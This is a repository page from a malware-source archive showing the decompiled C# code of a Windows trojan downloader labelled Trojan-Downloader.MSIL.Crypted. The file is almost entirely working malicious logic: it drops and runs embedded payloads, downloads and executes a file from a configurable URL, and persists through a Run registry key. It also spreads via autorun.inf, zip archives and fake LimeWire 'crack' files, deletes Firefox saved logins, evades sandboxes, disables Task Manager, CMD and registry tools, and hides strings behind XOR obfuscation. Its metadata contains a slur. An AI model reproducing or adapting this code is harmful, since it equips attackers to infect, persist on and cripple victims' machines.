daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
7290cd4cd5e7e20db608ed24e3b200314c60d6da
MalwareSourceCode/MSIL/Trojan-Downloader/MSIL/C/Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d/UWLUFUDALKLWDKKSWDKFWOIKK97.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

324 lines
13 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: UWLUFUDALKLWDKKSWDKFWOIKK97
// Assembly: If you accept this then you are really a faggot like seriously lol jk i love you and yes you can rename this long ass file name lol, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FF29E54-20E1-4588-8681-38890A7A949F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-1b34a57da3d1e4c766696e1b4d3dc33eb69cf2d6cf4b0c051b173851e23e542d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
using System.Windows.Forms;
[StandardModule]
public sealed class UWLUFUDALKLWDKKSWDKFWOIKK97
{
[STAThread]
public static void Main()
{
string[] strArray1 = Strings.Split(File.ReadAllText(Application.ExecutablePath), "&^Q@#&*$^*&!@$");
string[] strArray2 = Strings.Split(rp.eqwrsdafasdf(strArray1[1], strArray1[2]), "AJJFIOEURASJFKLJSAIODF");
if (Operators.CompareString(strArray2[1], "SHIT", false) != 0)
{
if (strArray2[11].Contains(".exe"))
{
rp.inject(Encoding.Default.GetBytes(strArray2[1]));
}
else
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[11], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[1], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[11]);
}
}
if (Operators.CompareString(strArray2[2], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[12], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[2], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[12]);
}
if (Operators.CompareString(strArray2[3], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[13], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[3], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[13]);
}
if (Operators.CompareString(strArray2[4], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[14], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[4], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[14]);
}
if (Operators.CompareString(strArray2[5], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[15], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[5], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[15]);
}
if (Operators.CompareString(strArray2[6], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[16], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[6], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[16]);
}
if (Operators.CompareString(strArray2[7], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[17], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[7], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[17]);
}
if (Operators.CompareString(strArray2[8], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[18], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[8], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[18]);
}
if (Operators.CompareString(strArray2[9], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[19], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[9], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[19]);
}
if (Operators.CompareString(strArray2[10], "SHIT", false) != 0)
{
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[20], OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, strArray2[10], -1L, false);
FileSystem.FileClose(5);
Process.Start(Path.GetTempPath() + strArray2[20]);
}
if (Conversions.ToBoolean(strArray2[21]))
{
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~`rdrFZ"));
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK16(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@^GT]T"));
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK17();
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK18();
}
if (Conversions.ToBoolean(strArray2[22]))
{
if (!File.Exists(Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")))
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV"));
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@\\UCFRAVk|ZPAXB\\UGkfZ]WXF@opBCAV]CgVA@^^]oaB_"), true);
registryKey.SetValue(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "~ZPE^@\\UC\u0011p\\]QXTFAVEZ\\]"), (object) (Path.GetTempPath() + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "^@PX_UZT\u0019TKV")));
registryKey.Close();
}
if (Conversions.ToBoolean(strArray2[23]))
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (Directory.Exists(str))
{
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
MyProject.Computer.FileSystem.DeleteFile(file);
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
if (Conversions.ToBoolean(strArray2[24]))
{
string[] logicalDrives = Directory.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
string str = logicalDrives[index];
if (!File.Exists(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR")))
File.Copy(Assembly.GetExecutingAssembly().Location, str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@VGBA\u001DVKR"));
StreamWriter streamWriter = new StreamWriter(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "hRFC^AF]j"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "\\CVY\f@VGBA\u001DVKR"));
streamWriter.WriteLine(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "@[V[]VKVTDGV\u000EDTGFC\u0019TKV"));
streamWriter.Close();
File.SetAttributes(str + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("13337", "RFGXCF]\u001D^_U"), FileAttributes.Hidden);
checked { ++index; }
}
}
if (Conversions.ToBoolean(strArray2[25]))
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26("C:\\", Application.ExecutablePath);
if (Conversions.ToBoolean(strArray2[26]))
{
int num = 0;
foreach (object obj in new ArrayList()
{
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\limewire\\shared\\")
})
{
string path = Convert.ToString(RuntimeHelpers.GetObjectValue(obj));
if (Directory.Exists(path))
{
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
int index = 0;
while (index < directories.Length)
{
string str = directories[index];
string destFileName = path + "\\" + str.Substring(str.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
File.Copy(Process.GetCurrentProcess().MainModule.FileName, destFileName, true);
checked { ++num; }
checked { ++index; }
}
}
}
}
if (Conversions.ToBoolean(strArray2[27]))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
if (Conversions.ToBoolean(strArray2[28]))
{
MyProject.Computer.Network.DownloadFile(strArray2[33], Path.GetTempPath() + "msconfigdl.exe");
Process.Start(Path.GetTempPath() + "msconfigdl.exe");
}
if (Conversions.ToBoolean(strArray2[29]))
Process.Start(strArray2[34]);
if (Conversions.ToBoolean(strArray2[30]))
{
StreamWriter streamWriter = new StreamWriter(UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "\u0002|\u0018\u0011((7.17\u001A\u0012? 5#)us\u001A73/2#35\u000F$2'\u001A)) 55"));
string str = Conversions.ToString(Operators.CompareString("\n" + UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK591415("SAFDFAF", "ptshqhcowd161}7/6322<5'(h"), ")", false) > 0);
streamWriter.Write(str);
streamWriter.Close();
}
if (Conversions.ToBoolean(strArray2[31]))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
if (!Conversions.ToBoolean(strArray2[32]))
return;
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
}
public static string UWLUFUDALKLWDKKSWDKFWOIKK591415(
string UWLUFUDALKLWDKKSWDKFWOIKKas,
string UWLUFUDALKLWDKKSWDKFWOIKKdaze)
{
long num1 = (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKdaze);
long Start = 1;
string str;
while (Start <= num1)
{
int num2 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKdaze, checked ((int) Start), 1));
int num3 = Strings.Asc(Strings.Mid(UWLUFUDALKLWDKKSWDKFWOIKKas, checked ((int) (unchecked (Start % (long) Strings.Len(UWLUFUDALKLWDKKSWDKFWOIKKas)) + 1L)), 1));
str += Conversions.ToString(Strings.Chr(num2 ^ num3));
checked { ++Start; }
}
return str;
}
public static void UWLUFUDALKLWDKKSWDKFWOIKK16(string UWLUFUDALKLWDKKSWDKFWOIKK86)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (process.ProcessName.Contains(UWLUFUDALKLWDKKSWDKFWOIKK86))
{
try
{
process.Kill();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
public static void UWLUFUDALKLWDKKSWDKFWOIKK17()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
private static void UWLUFUDALKLWDKKSWDKFWOIKK18()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
public static void UWLUFUDALKLWDKKSWDKFWOIKK26(
string UWLUFUDALKLWDKKSWDKFWOIKK87,
string UWLUFUDALKLWDKKSWDKFWOIKK88)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
ListBox listBox = new ListBox();
try
{
string[] directories = Directory.GetDirectories(UWLUFUDALKLWDKKSWDKFWOIKK87);
int index1 = 0;
while (index1 < directories.Length)
{
string str1 = directories[index1];
string[] files = Directory.GetFiles(FileSystem.Dir(), "*.zip");
int index2 = 0;
while (index2 < files.Length)
{
string str2 = files[index2];
listBox.Items.Add((object) str2);
checked { ++index2; }
}
UWLUFUDALKLWDKKSWDKFWOIKK97.UWLUFUDALKLWDKKSWDKFWOIKK26(FileSystem.Dir(), UWLUFUDALKLWDKKSWDKFWOIKK88);
checked { ++index1; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
foreach (object obj in listBox.Items)
{
string str = Conversions.ToString(obj);
Process.Start(new ProcessStartInfo()
{
FileName = folderPath + "\\7-Zipz\\7z.exe",
Arguments = " a " + str.ToString() + " " + UWLUFUDALKLWDKKSWDKFWOIKK88,
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
}
Reference in New Issue View Git Blame Copy Permalink